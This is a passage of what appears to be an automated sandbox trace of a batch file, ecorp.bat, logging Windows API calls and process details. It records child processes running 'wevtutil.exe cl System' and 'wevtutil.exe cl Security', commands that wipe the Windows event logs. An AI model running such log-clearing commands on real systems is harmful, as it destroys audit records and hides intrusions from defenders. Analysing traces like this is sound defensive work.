_String2="ALLUSER", _MaxCount=0x7) returned 2 [0090.142] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0090.142] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0090.142] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0090.142] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0090.142] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0090.143] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0090.143] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0090.143] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0090.143] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0090.143] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0090.143] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0090.143] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0090.143] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0090.143] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0090.143] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0090.143] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0090.143] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0090.143] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0090.143] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0090.143] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0090.143] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0090.143] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0090.143] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0090.143] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0090.143] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0090.143] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0090.143] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0090.143] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0090.143] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0090.143] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0090.143] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0090.143] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0090.143] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0090.143] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0090.143] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0090.143] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0090.143] GetProcessHeap () returned 0x2d0000 [0090.143] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e4640 | out: hHeap=0x2d0000) returned 1 [0090.143] GetProcessHeap () returned 0x2d0000 [0090.143] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x12) returned 0x2f1fa0 [0090.143] lstrcmpW (lpString1="\\wevtutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0090.145] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\wevtutil.exe", lpCommandLine="wevtutil.exe cl System", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x27f4d0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="wevtutil.exe cl System", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x27f480 | out: lpCommandLine="wevtutil.exe cl System", lpProcessInformation=0x27f480*(hProcess=0x54, hThread=0x50, dwProcessId=0xa00, dwThreadId=0xb8c)) returned 1 [0090.148] CloseHandle (hObject=0x50) returned 1 [0090.148] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0090.148] GetProcessHeap () returned 0x2d0000 [0090.148] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eacc0 | out: hHeap=0x2d0000) returned 1 [0090.148] GetEnvironmentStringsW () returned 0x2eacc0* [0090.148] GetProcessHeap () returned 0x2d0000 [0090.148] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xae8) returned 0x2e8af0 [0090.148] FreeEnvironmentStringsW (penv=0x2eacc0) returned 1 [0090.148] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0090.418] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x27f3c8 | out: lpExitCode=0x27f3c8*=0x0) returned 1 [0090.418] CloseHandle (hObject=0x54) returned 1 [0090.418] _vsnwprintf (in: _Buffer=0x27f638, _BufferCount=0x13, _Format="%08X", _ArgList=0x27f3d8 | out: _Buffer="00000000") returned 8 [0090.418] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0090.418] GetProcessHeap () returned 0x2d0000 [0090.418] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e8af0 | out: hHeap=0x2d0000) returned 1 [0090.418] GetEnvironmentStringsW () returned 0x2e8af0* [0090.418] GetProcessHeap () returned 0x2d0000 [0090.418] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xb0e) returned 0x2ed810 [0090.418] FreeEnvironmentStringsW (penv=0x2e8af0) returned 1 [0090.418] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0090.418] GetProcessHeap () returned 0x2d0000 [0090.418] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ed810 | out: hHeap=0x2d0000) returned 1 [0090.418] GetEnvironmentStringsW () returned 0x2e8af0* [0090.418] GetProcessHeap () returned 0x2d0000 [0090.418] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xb0e) returned 0x2ed810 [0090.418] FreeEnvironmentStringsW (penv=0x2e8af0) returned 1 [0090.418] GetProcessHeap () returned 0x2d0000 [0090.418] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1fa0 | out: hHeap=0x2d0000) returned 1 [0090.418] DeleteProcThreadAttributeList (in: lpAttributeList=0x27f498 | out: lpAttributeList=0x27f498) [0090.418] _get_osfhandle (_FileHandle=1) returned 0x7 [0090.418] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0090.419] _get_osfhandle (_FileHandle=1) returned 0x7 [0090.419] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a24e194 | out: lpMode=0x4a24e194) returned 1 [0090.419] _get_osfhandle (_FileHandle=0) returned 0x3 [0090.419] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a24e198 | out: lpMode=0x4a24e198) returned 1 [0090.419] SetConsoleInputExeNameW () returned 0x1 [0090.419] GetConsoleOutputCP () returned 0x1b5 [0090.419] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a25bfe0 | out: lpCPInfo=0x4a25bfe0) returned 1 [0090.419] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0090.419] exit (_Code=0) Process: id = "20" image_name = "wevtutil.exe" filename = "c:\\windows\\system32\\wevtutil.exe" page_root = "0x7a02d000" os_pid = "0xa0c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "17" os_parent_pid = "0xb04" cmd_line = "wevtutil.exe cl Security" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 156 os_tid = 0xa10 Thread: id = 157 os_tid = 0xa04 Process: id = "21" image_name = "wevtutil.exe" filename = "c:\\windows\\system32\\wevtutil.exe" page_root = "0x1c7c6000" os_pid = "0xa00" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "19" os_parent_pid = "0xa38" cmd_line = "wevtutil.exe cl System" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 158 os_tid = 0xb8c Thread: id = 159 os_tid = 0xb74 Process: id = "22" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x72b67000" os_pid = "0xb94" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa44" cmd_line = "cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat\" \"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 161 os_tid = 0xb48 [0091.602] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14f8f0 | out: lpSystemTimeAsFileTime=0x14f8f0*(dwLowDateTime=0x492b6de0, dwHighDateTime=0x18d1aee)) [0091.602] GetCurrentProcessId () returned 0xb94 [0091.602] GetCurrentThreadId () returned 0xb48 [0091.602] GetTickCount () returned 0x25df7 [0091.602] QueryPerformanceCounter (in: lpPerformanceCount=0x14f8f8 | out: lpPerformanceCount=0x14f8f8*=21187139158) returned 1 [0091.604] GetModuleHandleW (lpModuleName=0x0) returned 0x4a980000 [0091.604] __set_app_type (_Type=0x1) [0091.604] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9a7810) returned 0x0 [0091.604] __getmainargs (in: _Argc=0x4a9ca608, _Argv=0x4a9ca618, _Env=0x4a9ca610, _DoWildCard=0, _StartInfo=0x4a9ae0f4 | out: _Argc=0x4a9ca608, _Argv=0x4a9ca618, _Env=0x4a9ca610) returned 0 [0091.605] GetCurrentThreadId () returned 0xb48 [0091.605] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb48) returned 0x3c [0091.605] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0091.605] GetProcAddress (hModule=0x76e30000, lpProcName="SetThreadUILanguage") returned 0x76e46d40 [0091.605] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0091.605] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0091.605] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14f888 | out: phkResult=0x14f888*=0x0) returned 0x2 [0091.605] VirtualQuery (in: lpAddress=0x14f870, lpBuffer=0x14f7f0, dwLength=0x30 | out: lpBuffer=0x14f7f0*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.605] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14f7f0, dwLength=0x30 | out: lpBuffer=0x14f7f0*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.605] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14f7f0, dwLength=0x30 | out: lpBuffer=0x14f7f0*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.605] VirtualQuery (in: lpAddress=0x54000, lpBuffer=0x14f7f0, dwLength=0x30 | out: lpBuffer=0x14f7f0*(BaseAddress=0x54000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.605] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14f7f0, dwLength=0x30 | out: lpBuffer=0x14f7f0*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0x0)) returned 0x30 [0091.605] GetConsoleOutputCP () returned 0x1b5 [0091.606] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9bbfe0 | out: lpCPInfo=0x4a9bbfe0) returned 1 [0091.606] SetConsoleCtrlHandler (HandlerRoutine=0x4a9a3184, Add=1) returned 1 [0091.606] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.606] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0091.606] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.606] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9ae194 | out: lpMode=0x4a9ae194) returned 1 [0091.606] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.606] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0091.607] _get_osfhandle (_FileHandle=0) returned 0x3 [0091.607] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9ae198 | out: lpMode=0x4a9ae198) returned 1 [0091.607] _get_osfhandle (_FileHandle=0) returned 0x3 [0091.607] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0091.607] GetEnvironmentStringsW () returned 0x268af0* [0091.607] GetProcessHeap () returned 0x250000 [0091.607] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xa7c) returned 0x269580 [0091.607] FreeEnvironmentStringsW (penv=0x268af0) returned 1 [0091.607] GetProcessHeap () returned 0x250000 [0091.607] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x8) returned 0x268370 [0091.607] GetEnvironmentStringsW () returned 0x268af0* [0091.607] GetProcessHeap () returned 0x250000 [0091.607] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xa7c) returned 0x26a010 [0091.607] FreeEnvironmentStringsW (penv=0x268af0) returned 1 [0091.607] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e748 | out: phkResult=0x14e748*=0x44) returned 0x0 [0091.608] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e740, lpData=0x14e760, lpcbData=0x14e744*=0x1000 | out: lpType=0x14e740*=0x0, lpData=0x14e760*=0x18, lpcbData=0x14e744*=0x1000) returned 0x2 [0091.608] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e740, lpData=0x14e760, lpcbData=0x14e744*=0x1000 | out: lpType=0x14e740*=0x4, lpData=0x14e760*=0x1, lpcbData=0x14e744*=0x4) returned 0x0 [0091.608] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e740, lpData=0x14e760, lpcbData=0x14e744*=0x1000 | out: lpType=0x14e740*=0x0, lpData=0x14e760*=0x1, lpcbData=0x14e744*=0x1000) returned 0x2 [0091.608] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e740, lpData=0x14e760, lpcbData=0x14e744*=0x1000 | out: lpType=0x14e740*=0x4, lpData=0x14e760*=0x0, lpcbData=0x14e744*=0x4) returned 0x0 [0091.608] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e740, lpData=0x14e760, lpcbData=0x14e744*=0x1000 | out: lpType=0x14e740*=0x4, lpData=0x14e760*=0x40, lpcbData=0x14e744*=0x4) returned 0x0 [0091.608] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e740, lpData=0x14e760, lpcbData=0x14e744*=0x1000 | out: lpType=0x14e740*=0x4, lpData=0x14e760*=0x40, lpcbData=0x14e744*=0x4) returned 0x0 [0091.608] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e740, lpData=0x14e760, lpcbData=0x14e744*=0x1000 | out: lpType=0x14e740*=0x0, lpData=0x14e760*=0x40, lpcbData=0x14e744*=0x1000) returned 0x2 [0091.608] RegCloseKey (hKey=0x44) returned 0x0 [0091.608] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e748 | out: phkResult=0x14e748*=0x44) returned 0x0 [0091.608] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e740, lpData=0x14e760, lpcbData=0x14e744*=0x1000 | out: lpType=0x14e740*=0x0, lpData=0x14e760*=0x40, lpcbData=0x14e744*=0x1000) returned 0x2 [0091.608] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e740, lpData=0x14e760, lpcbData=0x14e744*=0x1000 | out: lpType=0x14e740*=0x4, lpData=0x14e760*=0x1, lpcbData=0x14e744*=0x4) returned 0x0 [0091.608] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e740, lpData=0x14e760, lpcbData=0x14e744*=0x1000 | out: lpType=0x14e740*=0x0, lpData=0x14e760*=0x1, lpcbData=0x14e744*=0x1000) returned 0x2 [0091.608] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e740, lpData=0x14e760, lpcbData=0x14e744*=0x1000 | out: lpType=0x14e740*=0x4, lpData=0x14e760*=0x0, lpcbData=0x14e744*=0x4) returned 0x0 [0091.608] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e740, lpData=0x14e760, lpcbData=0x14e744*=0x1000 | out: lpType=0x14e740*=0x4, lpData=0x14e760*=0x9, lpcbData=0x14e744*=0x4) returned 0x0 [0091.608] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e740, lpData=0x14e760, lpcbData=0x14e744*=0x1000 | out: lpType=0x14e740*=0x4, lpData=0x14e760*=0x9, lpcbData=0x14e744*=0x4) returned 0x0 [0091.608] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e740, lpData=0x14e760, lpcbData=0x14e744*=0x1000 | out: lpType=0x14e740*=0x0, lpData=0x14e760*=0x9, lpcbData=0x14e744*=0x1000) returned 0x2 [0091.608] RegCloseKey (hKey=0x44) returned 0x0 [0091.608] time (in: timer=0x0 | out: timer=0x0) returned 0x1ad63547d1b [0091.608] srand (_Seed=0x63547d1b) [0091.608] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat\" \"" [0091.608] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat\" \"" [0091.609] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9bc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.609] GetProcessHeap () returned 0x250000 [0091.609] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x218) returned 0x26aaa0 [0091.609] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x26aab0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0091.609] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9af360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0091.609] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9af360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0091.609] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9af360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0091.609] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0091.609] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0091.609] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0091.609] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0091.609] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0091.609] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0091.609] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0091.609] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0091.609] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0091.609] GetProcessHeap () returned 0x250000 [0091.609] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x269580 | out: hHeap=0x250000) returned 1 [0091.609] GetEnvironmentStringsW () returned 0x268af0* [0091.609] GetProcessHeap () returned 0x250000 [0091.609] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xa94) returned 0x26b760 [0091.610] FreeEnvironmentStringsW (penv=0x268af0) returned 1 [0091.610] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9af360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0091.610] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9af360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0091.610] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0091.610] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0091.610] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0091.610] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0091.610] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0091.610] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0091.610] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0091.610] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0091.610] GetProcessHeap () returned 0x250000 [0091.610] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x5c) returned 0x251320 [0091.610] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14f550 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.610] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x14f550, lpFilePart=0x14f530 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x14f530*="Desktop") returned 0x25 [0091.610] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0091.610] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f260 | out: lpFindFileData=0x14f260*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x409658c0, ftLastAccessTime.dwHighDateTime=0x18d1aee, ftLastWriteTime.dwLowDateTime=0x409658c0, ftLastWriteTime.dwHighDateTime=0x18d1aee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xdd0000dd, cFileName="Users", cAlternateFileName="")) returned 0x268950 [0091.610] FindClose (in: hFindFile=0x268950 | out: hFindFile=0x268950) returned 1 [0091.610] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x14f260 | out: lpFindFileData=0x14f260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x409658c0, ftLastAccessTime.dwHighDateTime=0x18d1aee, ftLastWriteTime.dwLowDateTime=0x409658c0, ftLastWriteTime.dwHighDateTime=0x18d1aee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xdd0000dd, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x268950 [0091.610] FindClose (in: hFindFile=0x268950 | out: hFindFile=0x268950) returned 1 [0091.610] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0091.610] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x14f260 | out: lpFindFileData=0x14f260*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4907b940, ftLastAccessTime.dwHighDateTime=0x18d1aee, ftLastWriteTime.dwLowDateTime=0x4907b940, ftLastWriteTime.dwHighDateTime=0x18d1aee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xdd0000dd, cFileName="Desktop", cAlternateFileName="")) returned 0x268950 [0091.611] FindClose (in: hFindFile=0x268950 | out: hFindFile=0x268950) returned 1 [0091.611] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0091.611] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0091.611] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0091.611] GetProcessHeap () returned 0x250000 [0091.611] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26b760 | out: hHeap=0x250000) returned 1 [0091.611] GetEnvironmentStringsW () returned 0x268af0* [0091.611] GetProcessHeap () returned 0x250000 [0091.611] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xae8) returned 0x26acc0 [0091.611] FreeEnvironmentStringsW (penv=0x268af0) returned 1 [0091.611] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9bc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS 